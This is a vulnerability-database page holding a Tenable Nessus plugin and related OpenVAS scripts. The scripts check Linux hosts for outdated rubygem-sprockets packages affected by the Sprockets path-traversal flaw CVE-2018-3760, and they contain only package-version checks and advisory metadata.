ID: FEDORA_2018-FD29597FA4.NASL | Type: nessus | Reporter: This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof. | Modified: 2021-01-06T00:00:00
Description
Update to Sprockets 3.7.2. Fixes CVE-2018-3760:
https://access.redhat.com/security/cve/cve-2018-3760
Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Fedora Security Advisory FEDORA-2018-fd29597fa4.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
# Registration pass: the scanner runs this block with `description` set
# while it collects plugin metadata; the package check further down is
# not executed on that pass (the block ends with exit(0)).
script_id(111251);
script_version("1.6");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/06");
# Vulnerability and vendor advisory this plugin covers.
script_cve_id("CVE-2018-3760");
script_xref(name:"FEDORA", value:"2018-fd29597fa4");
script_name(english:"Fedora 27 : rubygem-sprockets (2018-fd29597fa4)");
script_summary(english:"Checks rpm output for the updated package.");
script_set_attribute(
attribute:"synopsis",
value:"The remote Fedora host is missing a security update."
);
# Description text is the Fedora update notice as extracted by Tenable;
# the literal below must stay unchanged (it is user-facing report text).
script_set_attribute(
attribute:"description",
value:
"Update to Sprockets 3.7.2. Fixes CVE-2018-3760:
https://access.redhat.com/security/cve/cve-2018-3760
Note that Tenable Network Security has extracted the preceding
description block directly from the Fedora update system website.
Tenable has attempted to automatically clean and format it as much as
possible without introducing additional issues."
);
# References shown in the report: the Red Hat CVE page and the Bodhi update.
script_set_attribute(
attribute:"see_also",
value:"https://access.redhat.com/security/cve/cve-2018-3760"
);
script_set_attribute(
attribute:"see_also",
value:"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd29597fa4"
);
script_set_attribute(
attribute:"solution",
value:"Update the affected rubygem-sprockets package."
);
# Severity: CVSSv2 5.0 (partial confidentiality loss) and CVSSv3 7.5
# (high confidentiality loss); both vectors are network-reachable,
# unauthenticated and need no user interaction.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
# Authenticated (local) check; CPEs identify the package and the OS release.
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:rubygem-sprockets");
script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:27");
script_set_attribute(attribute:"vuln_publication_date", value:"2018/06/26");
script_set_attribute(attribute:"patch_publication_date", value:"2018/07/14");
script_set_attribute(attribute:"plugin_publication_date", value:"2018/07/24");
script_set_attribute(attribute:"generated_plugin", value:"current");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_family(english:"Fedora Local Security Checks");
# Knowledge-base keys the check body reads (local checks flag, release
# string, rpm list); presumably populated by the ssh_get_info.nasl
# dependency -- confirm against that script.
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list");
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("rpm.inc");
# Host preconditions for the package check. Each audit() call records why
# the host could not be assessed and ends the script, so every statement
# after a failed check can assume the preceding ones passed.
if (!get_kb_item("Host/local_checks_enabled"))
  audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

# The release string must exist and name a Fedora host ...
release = get_kb_item("Host/RedHat/release");
if (isnull(release)) audit(AUDIT_OS_NOT, "Fedora");
if ("Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora");

# ... and its major version must be exactly 27; the "([^0-9]|$)" tail
# keeps a longer number such as "270" from matching.
ver_match = pregmatch(pattern: "Fedora.*release ([0-9]+)", string:release);
if (isnull(ver_match)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora");
os_ver = ver_match[1];
if (!preg(pattern:"^27([^0-9]|$)", string:os_ver))
  audit(AUDIT_OS_NOT, "Fedora 27", "Fedora " + os_ver);

# The rpm inventory is what rpm_check() compares against.
if (!get_kb_item("Host/RedHat/rpm-list"))
  audit(AUDIT_PACKAGE_LIST_MISSING);

# Only x86 hosts are assessed: on any other architecture the script ends
# with "local checks not implemented" instead of a package verdict, so a
# Fedora 27 host on e.g. aarch64 is reported as unchecked, not as clean.
# NOTE(review): rubygem-sprockets looks architecture-independent, so this
# gate is probably wider than the package needs -- confirm.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
is_x86 = ("x86_64" >< cpu) || (cpu =~ "^i[3-6]86$");
if (!is_x86) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu);
# Compare the installed rubygem-sprockets with the fixed Fedora 27 build
# from the advisory; an older installed version makes the host vulnerable.
vulnerable = rpm_check(release:"FC27", reference:"rubygem-sprockets-3.7.2-1.fc27");

if (!vulnerable)
{
  # Nothing flagged: distinguish "installed and already fixed" from
  # "not installed" so the audit reason is accurate.
  tested = pkg_tests_get();
  if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
  else audit(AUDIT_PACKAGE_NOT_INSTALLED, "rubygem-sprockets");
}
else
{
  # Report the finding with the rpm comparison as supporting evidence.
  security_report_v4(
    port : 0,
    severity : SECURITY_WARNING,
    extra : rpm_report_get()
  );
  exit(0);
}
{"id": "FEDORA_2018-FD29597FA4.NASL", "vendorId": null, "type": "nessus", "bulletinFamily": "scanner", "title": "Fedora 27 : rubygem-sprockets (2018-fd29597fa4)", "description": "Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2018-07-24T00:00:00", "modified": "2021-01-06T00:00:00", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {"score": 7.5, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"}, "href": "https://www.tenable.com/plugins/nessus/111251", "reporter": "This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://access.redhat.com/security/cve/cve-2018-3760", "https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd29597fa4", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-3760"], "cvelist": ["CVE-2018-3760"], "immutableFields": [], "lastseen": "2022-05-23T16:06:57", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-3760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1419-1:7C53E", "DEBIAN:DSA-4242-1:A62DA", "DEBIAN:DSA-4242-1:C27C6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-3760"]}, {"type": "fedora", "idList": ["FEDORA:2E73F65F395E", "FEDORA:714376469796"]}, {"type": "github", "idList": ["GHSA-PR3H-JJHJ-573X"]}, {"type": "hackerone", "idList": ["H1:307808"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4242.NASL", "FEDORA_2018-2735A12B72.NASL", "OPENSUSE-2018-686.NASL", "OPENSUSE-2018-773.NASL", "OPENSUSE-2019-542.NASL", "WEB_APPLICATION_SCANNING_112718"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108543", "OPENVAS:1361412562310704242", 
"OPENVAS:1361412562310851804", "OPENVAS:1361412562310852058", "OPENVAS:1361412562310874818", "OPENVAS:1361412562310874819", "OPENVAS:1361412562310891419"]}, {"type": "redhat", "idList": ["RHSA-2018:2244", "RHSA-2018:2245", "RHSA-2018:2561", "RHSA-2018:2745"]}, {"type": "seebug", "idList": ["SSV:97466"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1854-1", "OPENSUSE-SU-2018:2124-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-3760"]}], "rev": 4}, "score": {"value": 5.8, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2018-3760"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1419-1:7C53E", "DEBIAN:DSA-4242-1:C27C6"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2018-3760"]}, {"type": "fedora", "idList": ["FEDORA:2E73F65F395E", "FEDORA:714376469796"]}, {"type": "github", "idList": ["GHSA-PR3H-JJHJ-573X"]}, {"type": "hackerone", "idList": ["H1:307808"]}, {"type": "nessus", "idList": ["OPENSUSE-2018-686.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704242", "OPENVAS:1361412562310851804", "OPENVAS:1361412562310874818", "OPENVAS:1361412562310874819"]}, {"type": "redhat", "idList": ["RHSA-2018:2245"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-3760"]}, {"type": "seebug", "idList": ["SSV:97466"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:1854-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2018-3760"]}]}, "exploitation": null, "vulnersScore": 5.8}, "_state": {"dependencies": 0}, "_internal": {}, "pluginID": "111251", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-fd29597fa4.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111251);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2018-3760\");\n 
script_xref(name:\"FEDORA\", value:\"2018-fd29597fa4\");\n\n script_name(english:\"Fedora 27 : rubygem-sprockets (2018-fd29597fa4)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to Sprockets 3.7.2. Fixes CVE-2018-3760:\nhttps://access.redhat.com/security/cve/cve-2018-3760\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-3760\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-fd29597fa4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected rubygem-sprockets package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:rubygem-sprockets\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"rubygem-sprockets-3.7.2-1.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rubygem-sprockets\");\n}\n", "naslFamily": "Fedora Local Security Checks", "cpe": ["p-cpe:/a:fedoraproject:fedora:rubygem-sprockets", "cpe:/o:fedoraproject:fedora:27"], "solution": "Update the affected rubygem-sprockets package.", "nessusSeverity": "Medium", "cvssScoreSource": "", "vpr": {"risk factor": "Low", "score": "3.6"}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": "2018-07-14T00:00:00", "vulnerabilityPublicationDate": "2018-06-26T00:00:00", 
"exploitableWith": []}
{"ubuntucve": [{"lastseen": "2021-11-22T21:35:47", "description": "There is an information leak vulnerability in Sprockets. Versions Affected:\n4.0.0.beta7 and lower, 3.7.1 and lower, 2.12.4 and lower. Specially crafted\nrequests can be used to access files that exists on the filesystem that is\noutside an application's root directory, when the Sprockets server is used\nin production. All users running an affected release should either upgrade\nor use one of the work arounds immediately.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=901913>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-06-26T00:00:00", "type": "ubuntucve", "title": "CVE-2018-3760", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-3760"], "modified": "2018-06-26T00:00:00", "id": "UB:CVE-2018-3760", "href": "https://ubuntu.com/security/CVE-2018-3760", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:33:07", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-07-15T00:00:00", "type": "openvas", "title": 
"Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310874819", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874819", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_2735a12b72_rubygem-sprockets_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874819\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-07-15 06:08:13 +0200 (Sun, 15 Jul 2018)\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-sprockets FEDORA-2018-2735a12b72\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-sprockets on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-2735a12b72\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RERZUR7IR6MHMK4T4P4PMNH7VEOLEBYO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-sprockets\", rpm:\"rubygem-sprockets~3.7.2~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-07-04T18:55:27", "description": "Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application", "cvss3": {}, "published": "2018-07-09T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4242-1 (ruby-sprockets - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704242", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704242", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4242-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704242\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_name(\"Debian Security Advisory DSA 4242-1 (ruby-sprockets - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-07-09 00:00:00 +0200 (Mon, 09 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4242.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"ruby-sprockets on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (stretch), this problem has been fixed in\nversion 3.7.0-1+deb9u1.\n\nWe recommend that you upgrade your ruby-sprockets packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/ruby-sprockets\");\n script_tag(name:\"summary\", value:\"Orange Tsai discovered a path traversal flaw in ruby-sprockets, a\nRack-based asset packaging system. 
A remote attacker can take advantage\nof this flaw to read arbitrary files outside an application's root\ndirectory via specially crafted requests, when the Sprockets server is\nused in production.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"ruby-sprockets\", ver:\"3.7.0-1+deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-31T17:33:37", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-26T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:2124-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310852058", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852058", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.852058\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:40:17 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for rubygem-sprockets (openSUSE-SU-2018:2124-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2124-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-07/msg00041.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-sprockets'\n package(s) announced via the openSUSE-SU-2018:2124-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for rubygem-sprockets fixes the following issues:\n\n The following security vulnerability was addressed:\n\n - CVE-2018-3760: Fixed a path traversal issue in\n sprockets/server.rb:forbidden_request?(), which allowed remote attackers\n to read arbitrary files (bsc#1098369)\n\n This update was imported from the 
SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-773=1\");\n\n script_tag(name:\"affected\", value:\"rubygem-sprockets on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.5-rubygem-sprockets\", rpm:\"ruby2.5-rubygem-sprockets~3.7.2~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"uby2.5-rubygem-sprockets-doc\", rpm:\"uby2.5-rubygem-sprockets-doc~3.7.2~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-08-29T14:54:53", "description": "Discourse is prone to a information leak vulnerability in the\n ", "cvss3": {}, "published": "2019-01-30T00:00:00", "type": "openvas", "title": "Discourse < 2.2.0.beta2 Information Leak Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-3760"], "modified": "2019-08-28T00:00:00", "id": "OPENVAS:1361412562310108543", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108543", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Discourse < 
2.2.0.beta2 Information Leak Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:discourse:discourse\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108543\");\n script_version(\"2019-08-28T09:18:40+0000\");\n script_cve_id(\"CVE-2018-3760\");\n script_tag(name:\"last_modification\", value:\"2019-08-28 09:18:40 +0000 (Wed, 28 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-30 11:11:39 +0100 (Wed, 30 Jan 2019)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", 